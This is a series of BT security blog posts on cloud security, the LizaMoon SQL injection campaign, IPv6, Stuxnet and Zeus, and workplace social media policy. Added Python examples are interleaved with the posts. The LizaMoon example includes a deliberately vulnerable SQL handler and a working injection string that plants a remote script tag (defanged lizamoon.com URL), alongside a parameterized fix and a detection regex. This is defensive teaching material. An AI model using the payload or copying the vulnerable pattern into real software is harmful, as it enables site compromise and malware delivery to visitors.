
Posts tagged - BT

Monday, June 6, 2011

Guest Post: The Mission of the Cloud Security Alliance

By Jim Reavis, Executive Director, Cloud Security Alliance

Cloud computing is all the rage today, even though many people are still confused about what it is.

Simply put, cloud is about using computing as a utility service with a pay-per-use model, with the ability to rapidly provision more or less compute and storage resources as needed.  Cloud aligns the cost of computing with its usage.  The primary value of cloud is not the obvious cost savings, but the agility to transform ideas into IT-enabled services in hours or days, versus taking months or years to do the same tasks with traditional IT.

However, the primary barrier to the adoption of any new information technology is the concern over security and trustworthiness, particularly a computer service that may be shared with many other organizations.

To that end, the Cloud Security Alliance was established in late 2008, with a mission to promote the use of best practices for providing security assurance within cloud computing, and provide education on the uses of cloud computing to help secure all other forms of computing.  CSA is a global, non-profit association with over 20,000 members in over 40 chapters around the world.

CSA is focused on the rapid development of best practices to secure the cloud, educating the community on the latest research and encouraging innovation to secure the cloud of the future.  We view our mandate as requiring a broad perspective, addressing governance, compliance and legal issues, as well as many different operational and technical concerns, including information lifecycle management, interoperability, identity management, encryption and virtualization.

We provide our research in the form of a wealth of free whitepapers and tools to simplify the architecture, adoption and assessment of secure cloud services.  We also have a user certification, the Certificate of Cloud Security Knowledge (CCSK), an online examination to demonstrate one’s proficiency in cloud computing security issues and best practices.  You can find out more at www.cloudsecurityalliance.org.

Tuesday, May 24, 2011

Take the Challenge

By Tara Savage, Senior Marketing Manager, BT Global Services

This week we’ve posted two pieces by Jill Knesek, BT’s CSO, on why personal mobile devices do not foreshadow the downfall of corporate network integrity.  The bottom line, as Jill sees it, is that the benefits of an empowered and educated workforce who can respond to a business need or a client request instantly far outweigh the potential threats posed by supporting personal devices on the network.  In fact, when her team conducted the risk analysis, the threat posed by personal devices was no greater than that posed by company-approved devices.

It seems that mobile device and application security and privacy is one of the hot topics at the moment; just ask the folks over at Apple and Google.  Bruce Schneier, BT’s CSTO, alerted us to the Develop for Privacy challenge being run by the ACLU and the Tor Project.  In much the same way that Jill’s team seeks to educate BT’s employees about issues related to security and privacy, this competition asks entrants to develop applications that will educate users about privacy issues related to mobile device use.

Are you interested in taking the challenge?  The competition closes on May 31st, 2011.


Good luck!

Wednesday, May 11, 2011

New SQL Injection Attack Dubbed LizaMoon Impacts Millions of Sites

By Karl Smith, Head of Cyber Security Assurance Services, Business Continuity, Security & Governance, BT

The recent “LizaMoon” attack started small and grew quickly.  LizaMoon is a mass SQL injection campaign that writes a “script src=hxxp://lizamoon.com/ur.php” tag, along with other code, into the text a website stores in its database, so that the tag is served to visitors as part of the site’s own pages.  The injected script redirects the visitor to another website that serves a Trojan.

Typically, web applications are expected to validate their input and to keep user-supplied values out of the SQL they execute (parameterized queries are the reliable way to do this, since filters that try to recognise rogue commands are easily bypassed), but as this attack shows, many sites have no such protection in place.

At first, the number of unique URLs affected was around 28,000, but that number rose quickly, and more than 1.5 million have since been reported hit.

Interestingly, one of them was iTunes, which has more users, and more potential for damage from this type of attack, than most websites.  The affected iTunes content rendered the injected script tags as encoded text rather than executing them, so the attack was neutralized there, but some conjecture that this attempt at hacking iTunes might “constitute an exploratory attack vector, designed to be part of a more sophisticated blended attack that could seek to exploit weakness within the iTunes client/software which would yield a far greater exploitation threshold of millions of infections in a matter of minutes/hours.”

Given that more than 220 million iPods have been sold across the globe, this scenario could become devastating quite quickly.

LizaMoon and like threats make it even more critical that organizations are proactively monitoring networks and remaining vigilant to possible threats, particularly given how many employees telecommute and use personal computing devices to access company networks.
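The mechanics described above, as an added example that is not part of the BT post: a deliberately vulnerable “edit article title” handler that splices the title into SQL and runs it through a multi-statement API, the same handler with a parameterized statement, output encoding at render time (the reason the injected tag was harmless in iTunes), and a sweep of stored text for the injected tag.  The SQLite table, rows and function names are constructed for the illustration; the injected tag is the one the post reports, with the URL defanged as “hxxp”.

```python
"""Added example (not from the BT post): how a LizaMoon-style mass injection
lands in a database, how a parameterized statement stops it, and how to sweep
stored content for the injected tag afterwards. Uses SQLite in memory; the
table, rows and endpoint names are constructed for the illustration."""
import html
import re
import sqlite3

# The tag the post reports being appended to page content ("hxxp" defangs the URL).
INJECTED_TAG = '<script src=hxxp://lizamoon.com/ur.php></script>'

# Attacker-controlled value for an "edit article title" endpoint: closes the
# string, scopes the original UPDATE, appends an UPDATE that tags every row's
# body, then comments out the rest of the application's statement.
ATTACK_TITLE = (
    "Welcome' WHERE id = 1; "
    "UPDATE articles SET body = body || '" + INJECTED_TAG + "'; --"
)


def make_db():
    """Constructed sample CMS table with two articles."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles (title, body) VALUES ('Welcome', 'Hello world');
        INSERT INTO articles (title, body) VALUES ('About', 'Company info');
    """)
    return conn


def set_title_vulnerable(conn, article_id, title):
    """Deliberately vulnerable: the title is spliced into SQL text and run
    through a multi-statement API, so a crafted title adds its own UPDATE."""
    sql = "UPDATE articles SET title = '%s' WHERE id = %d;" % (title, article_id)
    conn.executescript(sql)


def set_title_safe(conn, article_id, title):
    """Hardened form: a parameterized statement. The value travels separately
    from the SQL text, so quotes and semicolons in it are just characters."""
    conn.execute("UPDATE articles SET title = ? WHERE id = ?", (title, article_id))
    conn.commit()


def render_title(conn, article_id):
    """Output encoding at render time: even a stored '<script' becomes inert text."""
    (title,) = conn.execute(
        "SELECT title FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return html.escape(title)


# Any <script ... src=...> include in stored text is suspicious on a site that
# never stores markup; widen or tighten this for a real CMS.
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=", re.IGNORECASE)


def find_injected_rows(conn, table, columns):
    """Sweep text columns for a remote script include; returns (id, column) pairs.
    table/columns come from the operator's allowlist, never from user input."""
    hits = []
    for col in columns:
        for row_id, value in conn.execute(f"SELECT id, {col} FROM {table} ORDER BY id"):
            if isinstance(value, str) and SCRIPT_SRC.search(value):
                hits.append((row_id, col))
    return hits


if __name__ == "__main__":
    db = make_db()
    set_title_vulnerable(db, 1, ATTACK_TITLE)
    print("vulnerable path, tagged rows:", find_injected_rows(db, "articles", ["body"]))
    db = make_db()
    set_title_safe(db, 1, ATTACK_TITLE)
    print("parameterized path, tagged rows:", find_injected_rows(db, "articles", ["body"]))
    print("rendered title:", render_title(db, 1))
```

On the vulnerable path both article bodies end up carrying the tag, which is the LizaMoon symptom; on the parameterized path the hostile string is stored as the literal title and, because the renderer encodes it, is displayed rather than executed.  The sweep is the post-incident check: run it over every text column after a suspected mass injection, and alert when it returns anything.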


Wednesday, April 13, 2011

Guest Blog: Security Up in the Clouds

By Nigel Hawthorn, Vice President EMEA Marketing, Blue Coat Systems (twitter.com/wheresnigel)

Innovative applications of cloud computing, including scalable, often virtualized storage, server and communications resources provisioned as a service over the Internet, are continuing to be deployed as organizations better understand this delivery model for IT services and its inherent benefits.

In the cybercriminal community, we see a cunning use of the cloud for dynamic threats – targeted, typically short-lived, using Web 2.0 techniques that rely upon dynamic links to spread malicious content, steal identities and money.  Ninety percent of malware comes from hidden download pointers in trusted and popular Web sites; and each day in 2009, 15,000 new web pages were infected with malware.  

Now, there are billions and billions of web pages, many of which – from news pages through blogs or search engine results – change literally in real time.

With a cybercriminal community busily injecting relays and malware through dynamic links, traditional reputation-based methods and definitions that download daily can’t hope to keep up.  However, just as criminals can use the cloud to obfuscate their attacks, we should consider one very obvious strength of its Internet foundation – the community of more than one user that is united over the web.

If, as soon as an attack was seen by one person on the web, that person could inform everyone else, then the attack would claim at most one victim.  The criminals would find that it doesn’t pay, and they’d move on to more lucrative crimes.  What we need is a cloud-based system that tells us about existing threats and dynamically investigates new web pages on behalf of everyone, working constantly with real-time intelligence on new sites, URLs and dynamic Web 2.0 content and links.

Of course the best way to gather that intelligence is from a broad, diverse and expanding community, connected by … you guessed it … the cloud.  As a community under collective threat, we can take a collective responsibility.  With cloud computing, we now have a mechanism for sharing that intelligence, sent anonymously into the cloud.

It makes sense to unite the power of the community as an input to a cloud-based ratings service, and leverage the cloud service as a delivery mechanism to update the filtering or scanning elements of your security layers as closely as possible to real time.  And depending on what makes sense operationally, the technology that acts on this intelligence may be a laptop client, free consumer application or a dedicated, high performance appliance or some other hybrid deployment.

The cloud will become relevant and progressively influence each layer, but only after you have weighed up the operational and cost benefits with the security, privacy and performance considerations.  Clearly, some options like community-driven cloud-delivered ratings should be considered right now to defend against the clear and present danger of Cybercrime 2.0.

As the year progresses, keep your options open, but keep your eyes even more open, and evolve your defenses to be open to cloud computing in an increasingly cloud-based hybrid approach.


Blue Coat Systems will be joining BT at Infosec 2011 along with other partners.  As such, we will be featuring guest posts on SecureThinking and BT Viewpoint leading up to the event.  If you are planning on attending the conference, come and find us at C92 (near the theatre and workshop area).

Monday, March 28, 2011

No Room at the Inn: IPv4 Makes Way for IPv6

By Sushila Nair, Product Manager, BT Counterpane

One of the largest landmarks in networking history is taking place.  The Internet has run out of room: the last blocks of IPv4 addresses have been handed over by IANA to the regional registries that distribute them.  The IPv4 Address Report predicts the date when those remaining blocks will be allocated and the address pool is completely exhausted, and that very last address should be handed out this year.

At the very foundation of the Internet, there is an addressing scheme that enables us to send data from one node to another.  With the number of new devices that have come onto the market and the growing mobile workforce, there has been a rapidly increasing demand on IP addresses.  As a result, organizations are now being forced to change.

New companies that require public registered Internet addresses will be forced to use IPv6 addresses once all of the IPv4 addresses have been allocated.  A large proportion of network equipment and operating systems are capable of running IPv6, and some come with the IPv6 stack enabled by default. Despite network equipment having been IPv6 capable for many years, a large proportion of applications and operational support systems are not — so moving to IPv6 is not a trivial task.

So now what?  Well, it is important to recognize that there are some differences between IPv4 and IPv6:

Length of Addresses: IPv4 addresses are 32 bits long; an example is 131.27.18.9.  IPv6 addresses are 128 bits long, written in hexadecimal with groups separated by colons; an example is 2001:0:4137:9e76:1052:15a1:6c68:2852.  The enormous address space of IPv6 removes the need for Network Address Translation (NAT), which opens up direct client-to-client application development but also removes the incidental shielding that NAT gave internal hosts, so every host needs an explicit firewall policy.

Configuration of Addresses: IPv6 addresses can be auto-configured (stateless address autoconfiguration): the device builds its own address from the prefix advertised by its nearest router and an interface identifier that, in the classic scheme, is derived from its MAC (node) address.

Protocol Changes: ARP has been replaced by NDP, the Neighbor Discovery Protocol, which runs over ICMPv6 and is no more authenticated than ARP was; neighbor spoofing and rogue router advertisements are the IPv6 counterparts of ARP poisoning.

Advanced Security: IPsec support is a mandatory part of the IPv6 node specification, but mandatory to implement does not mean enabled: using it still requires key management, policy configuration and firewalls that pass AH/ESP traffic.  Where those are in place, IPsec can protect traffic without changing applications.

In addition to these changes, there are other differences with IPv6 that one must prepare for, including support for quality of service, the use of multicast rather than broadcast, and fragmentation performed only by the sending host rather than by routers.

The changes in IPv6 result in a change in the attacks and vulnerabilities associated with the IP protocol stack.  Even the simple task of discovering which nodes are on your network changes: a single /64 subnet holds far too many addresses to sweep by brute force, so host discovery has to rely on other sources such as link-local multicast, router and switch neighbor caches, DNS and DHCPv6 logs.  Beyond the challenges of host discovery are the security issues raised by the fact that current network tools and devices are at varying stages of readiness for IPv6.
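Two of the points above, the MAC-derived address of stateless autoconfiguration and the size of the discovery problem, worked through as an added example that is not part of the BT post.  The functions build the EUI-64 interface identifier from a MAC, form the link-local and global addresses a host would configure itself with, recover the MAC from such an address (what an observer or a tracker can do), and estimate how long a brute-force sweep of a prefix takes.  The prefixes, MAC address and function names are constructed for the illustration.

```python
"""Added example (not from the BT post): the EUI-64 interface identifier that
classic stateless autoconfiguration derives from a MAC address, the reverse
mapping an observer can perform, and the size of the discovery problem a /64
creates. Prefixes and MAC addresses below are constructed for the illustration."""
import ipaddress


def eui64_interface_id(mac):
    """Build the 64-bit EUI-64 interface identifier from a 48-bit MAC:
    split the MAC in half, insert 0xFFFE, and flip the universal/local bit
    (bit 0x02 of the first octet)."""
    octets = bytes(int(part, 16) for part in mac.replace("-", ":").split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    iid = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    iid[0] ^= 0x02
    return bytes(iid)


def slaac_address(prefix, mac):
    """Address a host configures itself with from a router-advertised /64
    (use fe80::/64 for the link-local address)."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("stateless autoconfiguration uses a /64 prefix")
    return ipaddress.IPv6Address(net.network_address.packed[:8] + eui64_interface_id(mac))


def mac_from_address(addr):
    """Recover the MAC from an EUI-64 based address, or None if the interface
    identifier was not derived that way (random or manually assigned)."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    octets = bytearray(iid[:3] + iid[5:])
    octets[0] ^= 0x02
    return ":".join(f"{b:02x}" for b in octets)


def brute_force_scan_years(prefix, probes_per_second=1_000_000):
    """Years needed to probe every address in a prefix at a fixed probe rate."""
    count = ipaddress.IPv6Network(prefix, strict=False).num_addresses
    return count / probes_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    mac = "00:1b:63:84:45:e6"  # constructed sample MAC
    print(slaac_address("fe80::/64", mac))
    print(slaac_address("2001:db8:1:2::/64", mac))
    print(mac_from_address("2001:db8:1:2:21b:63ff:fe84:45e6"))
    print(f"{brute_force_scan_years('2001:db8:1:2::/64'):.0f} years to sweep one /64")
```

The reverse mapping is the security point of the classic scheme: the interface identifier is the same on every network the device joins, so it identifies the hardware wherever it goes, and it also tells a scanner which hosts share a vendor.  That is why privacy extensions (randomised, temporary identifiers) exist and why a /64 cannot be swept: at a million probes a second the sweep takes on the order of half a million years, so discovery on your own network has to come from neighbor caches, DNS and address management records rather than from scanning.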

It is challenging for organizations to learn what will and won’t work in the new IP world.  Organizations running default Windows configurations already have IPv6 enabled.  As IPv6 gains momentum, more and more devices will have both stacks enabled.  Attackers are going to start targeting IPv6, and if organizations are not controlling their IPv6 addressing, scanning for vulnerabilities over IPv6, and maintaining security policies and standards that cover it, they are going to be caught unprepared and unprotected.

Here on the SecureThinking blog, we will be running a series of articles highlighting IPv6 and the changes it will bring.

The IPv6 series will start with BT’s own IPv6 expert and published author, Tim Rooney, Director, Product Management, BT Diamond IP.  We will offer an autographed book giveaway on IP address management, a crucial component of IPv6 security.  We will also have guest bloggers share their perspectives on the changes that IPv6 will bring, as we lead up to World IPv6 Day.  

Please feel free to also share your opinions and questions on the topic by posting a comment below.  We know this issue will continue to drive discussion and interest in the community.


Wednesday, December 1, 2010

Innovation Series: If not Higher Education, then where?

By David Escalante, Director of Computer Policy & Security, Boston College

As part of a series on SecureThinking, we’ve recently focused on innovation.  We’ve debated the pros and cons of innovation within large multinationals.  One expert believed it was better to wait for a technology to be tried and proven before adoption.  Another expert took the stance that organizations need to take the leap to get an edge on the competition.  What impact does innovation have on other industries?

For this post, we are exploring innovation within the context of universities.  We want to know if innovation in IT security is beneficial for universities — or is it better to wait until a technology becomes standard before implementing.

We took this question to an expert in the field and asked his opinion.  David Escalante, Director of Computer Policy & Security at Boston College, asked if innovation doesn’t occur in Higher Education, then where else would it occur?  Here is his opinion:

Innovation can indeed be a difficult subject to understand. One of the great dilemmas of innovation is the extent to which innovation is appropriate, dangerous or both when applied to one’s core business.

Higher education has, generally speaking, had a simple core business model for hundreds of years, with a teacher in front of a classroom.  Innovation has occurred within the model in terms of how technology is used – think of copiers, whiteboards and more recently computers – but the subject at hand is not innovative teaching, but innovation within the security space.  Also, it is worth noting that higher education has contributed significantly to basic research over many years, which has certainly spurred innovation in a variety of fields.

It sometimes seems that security vendors are buying other companies and coming out with new versions of their existing software rather than introducing interesting, innovative technologies to meet the continuously evolving security threats.  And alas, major corporations seem to be busy doing the security compliance dance for their auditors and regulators rather than security innovation to better protect their assets and IP.

This leaves higher education as a sector that potentially can innovate in security.  It has an audience of millions of students and faculty members to protect.  And arguably, this audience neither expects nor requires the same level of security as say, a financial institution or the military, which allows some degree of flexibility in testing innovative approaches to security – a failure need not be catastrophic.  Residential campuses also occupy a niche between needing to protect key assets like a business and to serve as an ISP for those living on-campus. In such an environment, some level of innovation is critical since the network and usage models meld classic business and ISP models.

Higher education has been innovating in network asset identification, doing primitive network asset identification and admission control before the term was even defined under the name, “NetReg.”  It is also innovating in identity management, where the variety of campuses, individual roles, and joint research efforts has driven the need for federation.  Some campuses are actively collaborating on new ways to combat malware.  And the practice of removing users with malware from the network recently suggested by Scott Charney of Microsoft for ISPs has been used on many campuses for years now.

Curiously enough, however, much of this innovation is not driven by the specific recommendations one finds in texts on innovation.  Rather, it is driven by a combination of intellectual curiosity, budget inequalities, a strong desire to mitigate the threat landscape, and, finally, by inter-institutional collaboration.

Security practitioners from various institutions get together, determine what their security issues are, and, depending upon their budget and abilities, attempt to develop solutions to the issues. Then they get together again, discuss what they’ve done and review new security issues that demand their attention.  What works in some places will be tried in others, where it may or may not work.

In this way, innovation can proceed along the “just do it” approach while still being tested over time across multiple campuses where only the best solutions survive.

Wednesday, November 24, 2010

Top Attacks in 2010

By Rob Jamison, Manager – Network Intelligence, Managed Security Solutions Group, BT Global Services

Typically, at the end of each year, security professionals take a look back and decipher the top threats of the year.  You may see a top 10 list or a top five list, but ultimately, I believe there are really two major kinds of attack to contend with in 2010, or indeed in any year.  The first are attacks that try to steal money, and the second are attacks that do something else.  When I look back, Stuxnet and Zeus are this year’s examples of those two kinds.

Stuxnet and Zeus (Zbot) represent the pinnacle achievement of coordinated malware and are truly best-of-breed in what they do.  While Operation Aurora and all sorts of targeted attacks using blended approaches are occurring more frequently, Stuxnet and Zeus stand out 30 lengths ahead of the pack when we look back at 2010 and ask what “really mattered.”

Stuxnet represents the science-fiction-is-now-reality genre of the past year.  This worm/Trojan/botnet has managed to ford a major topological chasm that had held strong for several decades: the assumption that computerized systems controlling physical machines might be vulnerable to a targeted attack, but not to the kind of internet-based, self-propagating one that is out of everyone’s control.

In jumping from PC based x86 architecture into Programmable Logic Controller (PLC) instruction sets, Stuxnet went where no worm had gone before.  The authors of this worm have limited its destructive potential to physical systems using extremely specialized electronic motors; but in doing so, they have effectively and clearly rendered the blueprint of future attacks on Newtonian Mechanical Processes.  Stuxnet is a trend setter in things to come, maliciously achieving what so many companies have been trying to do for so long — “Seamlessly Integrating Differing Computational Architectures into a Single Unified System….  and then Killing Them.”

Zeus is state-of-the-art Botnet software built for robbing banks.  Zeus goes to where the money is — and goes there often.  Zeus’ design, control and effectiveness against online banking countermeasures are outstanding, and resale of the software packages has allowed people with little technical initiative to harness the power and conduct sophisticated criminal schemes.  More than 100 people in Zeus rings have been arrested this year to date, but these are the “mules” who are conducting the operator functions, not the architects of the program itself.   

Since anyone with access to the internet and a little capital can now become a “Botnet Commander,” this year has lowered the barrier to entry to the level of anyone who can play a video game or build a Facebook profile.  Instead of a SimCity-type game, the “player” is harvesting stolen credentials and capitalizing on vulnerabilities in authentication and authorization inherent in an antiquated financial system to move money around.  The tool is continually tweaked and optimized by different groups of people from the ones using it for profit.  The Automated Clearing House (ACH) network is ripe for abuse by this botnet: authorization for an ACH transfer is presumed from the transaction request itself, and that request is protected only by single-factor authentication.

What is on your list of top threats for this past year? 

Please drop a comment below and share your thoughts with our readers.

Monday, November 22, 2010

The social media wake-up call

By Ben Rothke, Senior Security Consultant, BT Global Services

The action taken earlier this month by the National Labor Relations Board, after a Connecticut woman was fired (illegally, in the NLRB’s view) from her job as an emergency medical technician for posting disparaging remarks about her boss on Facebook, is a big wake-up call for both the employer and the employee.

An administrative law judge is expected to hear the case in January 2011, but it is likely not to end there, as the losing party will certainly appeal.  It is expected that this case will make its way to the Supreme Court.

From an information security perspective, far too many firms wait for these kinds of wake-up calls before taking action.  Leading companies, however, are proactive and ensure that the appropriate information security policies and guidelines are there from the beginning.

The truth is that the term “wake-up call” may understate the situation.  This is a legal issue — and if organizations find themselves at the losing end of such a case, it can turn out to be an expensive proposition — lawyers’ fees, punitive damages, negative PR, regulatory findings, and more.  Not being prepared can be an extremely expensive lesson.

The authorities seem to be leaning toward treating comments in a social network setting about jobs and working conditions as protected concerted activity (the NLRB’s complaint rests on the National Labor Relations Act rather than on constitutional free-speech grounds), a factor that would allow employees to discuss their jobs and working conditions with co-workers.  Those employee rights translate into responsibilities that employers must undertake.

As more employers and employees are using social networking sites, this is a most topical issue.

Social networking in the workplace needs to be handled differently for the employer and for the employee.

For an employer, the following are a few of the many steps you need to take action on:

  1. First off, get in front of the social media wave.  Be proactive and assign a dedicated team to deal with the myriad issues around social networks.
  2. As social networks blur boundaries between roles, policy and strategy are crucial.  The border between the company and the outside world is evaporating, so your policy and strategy must reflect that.  Two firms that have comprehensive social media guidelines are IBM and Intel.
  3. Social networking policy is a must.  Even if your course of action is to completely prohibit social networking, you still need a clear and established policy.
  4. Create a rational, sensible program around your employees’ use of social media services.  Make sure this includes photography and video, and common sense advice (don’t reference clients, customers, or partners without obtaining their express permission, etc.).
  5. Human resources must be involved as social media can open a Pandora’s Box of HR issues.  HR needs to create directives for managing personal and professional time and create reasonable guidelines.  As part of the HR awareness process, explain how innocent social media postings can be misconstrued, how confidential data can accidently be shared, and other germane topics.
  6. Social media security awareness is crucial.  Don’t just give employees a generic five-slide PowerPoint.  Follow the “three Cs” of information security awareness — make it clear, comprehensive and continuous.

For the employee:

  1. For those new to Facebook, Twitter and other social media sites, curb your enthusiasm.  This is especially true for those with OCD or addictive personalities who often don’t appreciate the addictive nature of social networking.  Facebook is viral and indeed addictive — and as a salaried employee, don’t waste your workday on it.
  2. Realize that Facebook and postings on other social sites can get you fired.  When at work, realize that you are being paid to work.  Don’t abuse the trust your employer placed in hiring you.
  3. Most jobs in the US are at-will employment.  This is a doctrine of American law that defines an employment relationship in which – a) either party can break the relationship with no liability, provided there was no express contract for a definite term governing the employment relationship; and b) that the employer does not belong to a collective bargaining group (i.e., has not recognized a union).  Simply put, you are but one Facebook post away from losing your job.
  4. Ensure you know about and are compliant with your employer’s social media guidelines.  In the event you post something corporate, ensure that it is public information. 
  5. Take extra care if you “friend” your boss on Facebook.

Social media is awesome, but it is undeniable that it has introduced significant information security and privacy risks and issues.

At the organizational level, companies must recognize these risks and take a formal approach to deal with them.

At the individual’s level, employees can’t be naïve about their responsibilities when using social media.


Wednesday, November 17, 2010

Introducing Agility into Modeling Security Risks

By Tara Savage, Global Security Marketing Manager, BT        

In my previous post, I outlined the importance of agile security, especially as it relates to the complexity of global sourcing security requirements.  In this post, I will address agility as part of modeling security risks.  

In a recent article in Pulse magazine by the Institute of Information Security Professionals (IISP), Carl Colwill of the BT security team highlighted the importance of modeling security risks as it relates to global sourcing security requirements.

According to Carl, most business processes are a complex network of interrelationships between systems, applications and people.  Assessments require detailed decomposition and dependency analysis to identify critical components and potential vulnerabilities.  And risk profiles are likely to change when services are outsourced by an organization, even within the same country. 

The increase in outsourcing presents a significant challenge for most companies.  Indeed, outsourcing has transformed from an exception to a necessary and urgent priority to help companies meet their strategic goals.  In general terms, the key business drivers relating to outsourcing are:

  • Environment – for example, regional and operational factors
  • User population – for example, the number of potential third-party attackers and the nature of the data access they will have 

These key business drivers provide focus for risk model inputs, threat actors and attack scenarios.  Both of these key drivers also provide focus for prioritizing risk mitigation controls.

Carl stated in the article:

It is also possible to identify those factors and variables that can be driven by assumptions, for example, baseline levels of security within strategic partners.

Focus on the outputs of risk assessments is equally important: 

  • Security recommendations must support business decisions on outsourcing options, vendors, regions, and levels of protection
  • Mitigation controls must be chosen with long-term, end-to-end risk in mind
  • Keep management and compliance requirements in mind and reuse existing standards
  • Each security control must be owned, implemented, monitored, and integrated into risk management, compliance and governance frameworks
  • Each control will have an implementation and in-life management cost

Global sourcing business drivers have stimulated innovation and automation in security risk assessments, in communicating their results, in identifying controls, and in compliance regimes.  Risk calculations have become easier to perform, but ease of calculation is no substitute for understanding and ownership of the risk and of the levels of protection implemented.  This is why modeling tools have limits: they are designed to aid decisions in preliminary assessments and should not be used to replace a detailed risk assessment.

In order for this to be effective, it must build upon an effective outsourcing compliance framework that is central to all security risk management considerations.

Tuesday, November 2, 2010

BT monitors and connects HeidelbergCement global network in 38 countries

By Toby Weir-Jones, Vice President of Product Development, Managed Security Solutions Group, BT Global Services


BT’s recent announcement of the expansion of services for HeidelbergCement, one of the world’s leading manufacturers of building materials, illustrates a popular usage model for large BT customers worldwide.  BT’s Managed Security Monitoring services, powered by BT Counterpane, provide an overarching monitoring and audit capability for not only the customer’s own network and assets, but also the BT network infrastructure operated on the customer’s behalf.

The services therefore provide double value, since the customer receives prompt and comprehensive security guidance on the activities of their protective infrastructure, and the network operator (BT in this case) also receives information which may help in isolating nodes that are raising network availability or reliability concerns.

BT’s contract with HeidelbergCement will extend that company’s international data network to cover a total of nearly 1,000 locations in 38 countries.  In addition to the data network, BT will provide central access to the public Internet.  The central Internet gateways, located in Germany and the U.S., will be monitored in real time using BT’s Managed Security Monitoring services, powered by BT Counterpane.  BT’s managed network security monitoring combines a team of security experts, a rigorous process for incident detection and response, and best-of-breed technologies to provide organizations immediate feedback regarding the efficacy of a network’s security.

For more information about BT’s global security services, visit our Resource Center.